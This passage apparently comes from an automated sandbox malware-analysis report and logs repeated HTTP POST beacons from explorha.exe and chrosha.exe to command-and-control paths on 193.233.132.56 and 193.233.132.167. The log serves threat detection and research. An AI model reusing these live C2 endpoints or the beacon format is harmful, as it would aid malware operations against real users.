1169 | 192.168.2.5 | 51023 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:20.916228056 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:21.162967920 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1170 | 192.168.2.5 | 51024 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:21.421154022 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:21.673413038 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1171 | 192.168.2.5 | 51025 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:21.497060061 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:35:21.746897936 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1172 | 192.168.2.5 | 51026 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:21.999202967 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:22.248881102 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1173 | 192.168.2.5 | 51027 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:22.025607109 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:35:22.271529913 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1174 | 192.168.2.5 | 51028 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:22.521315098 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:22.773346901 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1175192.168.2.551029193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:22.600732088 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:22.844890118 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      1176 | 192.168.2.5 | 51030 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.092057943 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.338212013 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      1177 | 192.168.2.5 | 51031 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.124923944 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.376434088 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1178 | 192.168.2.5 | 51032 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.631459951 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.881716013 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1179 | 192.168.2.5 | 51033 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.691299915 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.933403969 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1180 | 192.168.2.5 | 51034 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:24.186110020 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:24.436192036 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1181 | 192.168.2.5 | 51035 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:24.228682995 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:24.471506119 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1182 | 192.168.2.5 | 51036 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:24.722877026 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:24.974175930 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1183 | 192.168.2.5 | 51037 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:24.786358118 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:25.029217005 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1184 | 192.168.2.5 | 51038 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:25.293483973 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:25.550812960 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1185 | 192.168.2.5 | 51039 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:25.317909002 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:25.557913065 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1186 | 192.168.2.5 | 51040 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:25.805366993 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:26.052229881 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1187 | 192.168.2.5 | 51041 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
